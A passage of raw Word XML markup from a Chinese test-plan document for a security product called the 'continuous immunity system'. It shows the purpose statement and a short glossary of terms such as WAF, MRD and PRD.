            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>96</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E2881F7" w14:textId="47C3D4AE" w:rsidR="00CD0BDF" w:rsidRDefault="00A912E4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8A151A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc408565286"/>
      <w:bookmarkStart w:id="6" w:name="_Toc407178516"/>
      <w:bookmarkStart w:id="7" w:name="_Toc402365239"/>
      <w:bookmarkStart w:id="8" w:name="_Toc404261489"/>
      <w:bookmarkStart w:id="9" w:name="_Toc395792049"/>
      <w:bookmarkStart w:id="10" w:name="_Toc399158096"/>
      <w:bookmarkStart w:id="11" w:name="_Toc404670832"/>
      <w:bookmarkStart w:id="12" w:name="_Toc405815988"/>
      <w:bookmarkStart w:id="13" w:name="_Toc395081467"/>
      <w:bookmarkStart w:id="14" w:name="_Toc412895572"/>
      <w:bookmarkStart w:id="15" w:name="_Toc404256536"/>
      <w:bookmarkStart w:id="16" w:name="_Toc410740832"/>
      <w:bookmarkStart w:id="17" w:name="_Toc344109952"/>
      <w:bookmarkStart w:id="18" w:name="_Toc402365240"/>
      <w:bookmarkStart w:id="19" w:name="_Toc412895573"/>
      <w:bookmarkStart w:id="20" w:name="_Toc407173581"/>
      <w:bookmarkStart w:id="21" w:name="_Toc402515171"/>
      <w:bookmarkStart w:id="22" w:name="_Toc408416099"/>
      <w:bookmarkStart w:id="23" w:name="_Toc407173371"/>
      <w:bookmarkStart w:id="24" w:name="_Toc344108133"/>
      <w:bookmarkStart w:id="25" w:name="_Toc344109951"/>
      <w:bookmarkStart w:id="26" w:name="_Toc407178517"/>
      <w:bookmarkStart w:id="27" w:name="_Toc336256881"/>
      <w:bookmarkStart w:id="28" w:name="_Toc408477612"/>
      <w:bookmarkStart w:id="29" w:name="_Toc404160050"/>
      <w:bookmarkStart w:id="30" w:name="_Toc336256948"/>
      <w:bookmarkStart w:id="31" w:name="_Toc407183777"/>
      <w:bookmarkStart w:id="32" w:name="_Toc404160365"/>
      <w:bookmarkStart w:id="33" w:name="_Toc395711727"/>
      <w:bookmarkStart w:id="34" w:name="_Toc338318119"/>
      <w:bookmarkStart w:id="35" w:name="_Toc410740833"/>
      <w:bookmarkStart w:id="36" w:name="_Toc399157848"/>
      <w:bookmarkStart w:id="37" w:name="_Toc398108167"/>
      <w:bookmarkStart w:id="38" w:name="_Toc473897052"/>
      <w:bookmarkStart w:id="39" w:name="_Toc402515172"/>
      <w:bookmarkStart w:id="40" w:name="_Toc399155996"/>
      <w:bookmarkStart w:id="41" w:name="_Toc405816174"/>
      <w:bookmarkStart w:id="42" w:name="_Toc395855642"/>
      <w:bookmarkStart w:id="43" w:name="_Toc336260886"/>
      <w:bookmarkStart w:id="44" w:name="_Toc473902318"/>
      <w:bookmarkStart w:id="45" w:name="_Toc408477611"/>
      <w:bookmarkStart w:id="46" w:name="_Toc405816510"/>
      <w:bookmarkStart w:id="47" w:name="_Toc407184459"/>
      <w:bookmarkStart w:id="48" w:name="_Toc407173372"/>
      <w:bookmarkStart w:id="49" w:name="_Toc408416098"/>
      <w:bookmarkStart w:id="50" w:name="_Toc473902319"/>
      <w:bookmarkStart w:id="51" w:name="_Toc407183776"/>
      <w:bookmarkStart w:id="52" w:name="_Toc407193038"/>
      <w:bookmarkStart w:id="53" w:name="_Toc408565287"/>
      <w:bookmarkStart w:id="54" w:name="_Toc407193039"/>
      <w:bookmarkStart w:id="55" w:name="_Toc404261928"/>
      <w:bookmarkStart w:id="56" w:name="_Toc344108134"/>
      <w:bookmarkStart w:id="57" w:name="_Toc405816511"/>
      <w:bookmarkStart w:id="58" w:name="_Toc336256536"/>
      <w:bookmarkStart w:id="59" w:name="_Toc412894751"/>
      <w:bookmarkStart w:id="60" w:name="_Toc398108166"/>
      <w:bookmarkStart w:id="61" w:name="_Toc338257821"/>
      <w:bookmarkStart w:id="62" w:name="_Toc407184458"/>
      <w:bookmarkStart w:id="63" w:name="_Toc395791729"/>
      <w:bookmarkStart w:id="64" w:name="_Toc473896675"/>
      <w:bookmarkStart w:id="65" w:name="_Toc473896674"/>
      <w:bookmarkStart w:id="66" w:name="_Toc338262176"/>
      <w:bookmarkStart w:id="67" w:name="_Toc338330320"/>
      <w:bookmarkStart w:id="68" w:name="_Toc336256537"/>
      <w:bookmarkStart w:id="69" w:name="_Toc399158095"/>
      <w:bookmarkStart w:id="70" w:name="_Toc338261297"/>
      <w:bookmarkStart w:id="71" w:name="_Toc395791728"/>
      <w:bookmarkStart w:id="72" w:name="_Toc336259976"/>
      <w:bookmarkStart w:id="73" w:name="_Toc338330319"/>
      <w:bookmarkStart w:id="74" w:name="_Toc338261298"/>
      <w:bookmarkStart w:id="75" w:name="_Toc338257820"/>
      <w:bookmarkStart w:id="76" w:name="_Toc395081466"/>
      <w:bookmarkStart w:id="77" w:name="_Toc336256947"/>
      <w:bookmarkStart w:id="78" w:name="_Toc336260275"/>
      <w:bookmarkStart w:id="79" w:name="_Toc405816173"/>
      <w:bookmarkStart w:id="80" w:name="_Toc336259975"/>
      <w:bookmarkStart w:id="81" w:name="_Toc336260274"/>
      <w:bookmarkStart w:id="82" w:name="_Toc336260885"/>
      <w:bookmarkStart w:id="83" w:name="_Toc395855641"/>
      <w:bookmarkStart w:id="84" w:name="_Toc412894750"/>
      <w:bookmarkStart w:id="85" w:name="_Toc337660417"/>
      <w:bookmarkStart w:id="86" w:name="_Toc338318118"/>
      <w:bookmarkStart w:id="87" w:name="_Toc404160364"/>
      <w:bookmarkStart w:id="88" w:name="_Toc407173580"/>
      <w:bookmarkStart w:id="89" w:name="_Toc337660188"/>
      <w:bookmarkStart w:id="90" w:name="_Toc473897051"/>
      <w:bookmarkStart w:id="91" w:name="_Toc399157847"/>
      <w:bookmarkStart w:id="92" w:name="_Toc404670831"/>
      <w:bookmarkStart w:id="93" w:name="_Toc337660416"/>
      <w:bookmarkStart w:id="94" w:name="_Toc405815987"/>
      <w:bookmarkStart w:id="95" w:name="_Toc399155995"/>
      <w:bookmarkStart w:id="96" w:name="_Toc395792048"/>
      <w:bookmarkStart w:id="97" w:name="_Toc337660189"/>
      <w:bookmarkStart w:id="98" w:name="_Toc395711726"/>
      <w:bookmarkStart w:id="99" w:name="_Toc404160049"/>
      <w:bookmarkStart w:id="100" w:name="_Toc404261927"/>
      <w:bookmarkStart w:id="101" w:name="_Toc338262175"/>
      <w:bookmarkStart w:id="102" w:name="_Toc404256535"/>
      <w:bookmarkStart w:id="103" w:name="_Toc336256882"/>
      <w:bookmarkStart w:id="104" w:name="_Toc404261488"/>
      <w:bookmarkStart w:id="105" w:name="_toc2865"/>
      <w:bookmarkStart w:id="106" w:name="_toc2898"/>
      <w:bookmarkStart w:id="107" w:name="_toc3249"/>
      <w:bookmarkStart w:id="108" w:name="_Toc222309944"/>
      <w:bookmarkStart w:id="109" w:name="_Toc227386469"/>
      <w:bookmarkStart w:id="110" w:name="_Toc227386326"/>
      <w:bookmarkStart w:id="111" w:name="_Toc36487880"/>
      <w:bookmarkStart w:id="112" w:name="_Toc36573206"/>
      <w:bookmarkStart w:id="113" w:name="_Toc523743148"/>
      <w:bookmarkStart w:id="114" w:name="_Toc36630283"/>
      <w:bookmarkStart w:id="115" w:name="_GoBack"/>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15"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>项目简介部分</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="109"/>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkEnd w:id="111"/>
      <w:bookmarkEnd w:id="112"/>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w14:paraId="72586FA4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc227386470"/>
      <w:bookmarkStart w:id="117" w:name="_Toc227386327"/>
      <w:bookmarkStart w:id="118" w:name="_Toc222309945"/>
      <w:bookmarkStart w:id="119" w:name="_Toc36487881"/>
      <w:bookmarkStart w:id="120" w:name="_Toc36573207"/>
      <w:bookmarkStart w:id="121" w:name="_Toc36630284"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档编写目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
      <w:bookmarkEnd w:id="117"/>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkEnd w:id="119"/>
      <w:bookmarkEnd w:id="120"/>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w14:paraId="45BFE7AE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="342" w:firstLine="684"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>对持续免疫系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>功能、性能、兼容性进行测试，制定测试计划，编写测试用例，设定测试策略，编写测试报告。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E27D6D9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc36573208"/>
      <w:bookmarkStart w:id="123" w:name="_Toc36630285"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名词解释</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="1f5"/>
        <w:tblW w:w="7622" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1382"/>
        <w:gridCol w:w="6240"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F44F83" w:rsidRPr="0020259A" w14:paraId="345BD9C2" w14:textId="77777777" w:rsidTr="003826BC">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382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C9D0670" w14:textId="77777777" w:rsidR="00F44F83" w:rsidRPr="0020259A" w:rsidRDefault="00F44F83" w:rsidP="00F44F83">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>缩略语</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F0CAD29" w14:textId="77777777" w:rsidR="00F44F83" w:rsidRPr="0020259A" w:rsidRDefault="00F44F83" w:rsidP="00235C56">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:ind w:firstLine="400"/>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F44F83" w:rsidRPr="0020259A" w14:paraId="1583C7C0" w14:textId="77777777" w:rsidTr="003826BC">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382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42BDB57A" w14:textId="77777777" w:rsidR="00F44F83" w:rsidRPr="0020259A" w:rsidRDefault="00F44F83" w:rsidP="00F44F83">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02E7E689" w14:textId="77777777" w:rsidR="00F44F83" w:rsidRPr="0020259A" w:rsidRDefault="00F44F83" w:rsidP="00235C56">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:ind w:firstLine="400"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>网站应用级入侵防御系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F44F83" w:rsidRPr="0020259A" w14:paraId="4B629612" w14:textId="77777777" w:rsidTr="003826BC">
        <w:trPr>
          <w:trHeight w:val="484"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B92CA25" w14:textId="77777777" w:rsidR="00F44F83" w:rsidRPr="0020259A" w:rsidRDefault="00F44F83" w:rsidP="00F44F83">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>FAQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4961E387" w14:textId="77777777" w:rsidR="00F44F83" w:rsidRPr="0020259A" w:rsidRDefault="00F44F83" w:rsidP="00235C56">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:ind w:firstLine="400"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>常见的问题项目与对应问题的解答</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F44F83" w:rsidRPr="0020259A" w14:paraId="70332296" w14:textId="77777777" w:rsidTr="003826BC">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382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20241D30" w14:textId="77777777" w:rsidR="00F44F83" w:rsidRPr="0020259A" w:rsidRDefault="00F44F83" w:rsidP="00F44F83">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>MRD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24807C74" w14:textId="77777777" w:rsidR="00F44F83" w:rsidRPr="0020259A" w:rsidRDefault="00F44F83" w:rsidP="00235C56">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:ind w:firstLine="400"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>市场需求文档</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F44F83" w:rsidRPr="0020259A" w14:paraId="418D4645" w14:textId="77777777" w:rsidTr="003826BC">
        <w:trPr>
          <w:trHeight w:val="484"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74C2DA63" w14:textId="77777777" w:rsidR="00F44F83" w:rsidRPr="0020259A" w:rsidRDefault="00F44F83" w:rsidP="00F44F83">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>RD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7240F894" w14:textId="77777777" w:rsidR="00F44F83" w:rsidRPr="0020259A" w:rsidRDefault="00F44F83" w:rsidP="00235C56">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:ind w:firstLine="400"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>产品需求文档</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F44F83" w:rsidRPr="0020259A" w14:paraId="43790425" w14:textId="77777777" w:rsidTr="003826BC">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382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63CD8C52" w14:textId="77777777" w:rsidR="00F44F83" w:rsidRPr="0020259A" w:rsidRDefault="00F44F83" w:rsidP="00F44F83">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>OA</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F8D1C06" w14:textId="77777777" w:rsidR="00F44F83" w:rsidRPr="0020259A" w:rsidRDefault="00F44F83" w:rsidP="00235C56">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:ind w:firstLine="400"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>证实服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F44F83" w:rsidRPr="0020259A" w14:paraId="0A09A0FE" w14:textId="77777777" w:rsidTr="003826BC">
        <w:trPr>
          <w:trHeight w:val="484"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14A0E3D9" w14:textId="77777777" w:rsidR="00F44F83" w:rsidRPr="0020259A" w:rsidRDefault="00F44F83" w:rsidP="00F44F83">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>eboot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B51BE97" w14:textId="77777777" w:rsidR="00F44F83" w:rsidRPr="0020259A" w:rsidRDefault="00F44F83" w:rsidP="00235C56">
            <w:pPr>
              <w:pStyle w:val="-7-"/>
              <w:ind w:firstLine="400"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>重启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A32A084" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc227386328"/>
      <w:bookmarkStart w:id="125" w:name="_Toc222309946"/>
      <w:bookmarkStart w:id="126" w:name="_Toc227386471"/>
      <w:bookmarkStart w:id="127" w:name="_Toc36487882"/>
      <w:bookmarkStart w:id="128" w:name="_Toc36573209"/>
      <w:bookmarkStart w:id="129" w:name="_Toc36630286"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试项目背景描述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
      <w:bookmarkEnd w:id="125"/>
      <w:bookmarkEnd w:id="126"/>
      <w:bookmarkEnd w:id="127"/>
      <w:bookmarkEnd w:id="128"/>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
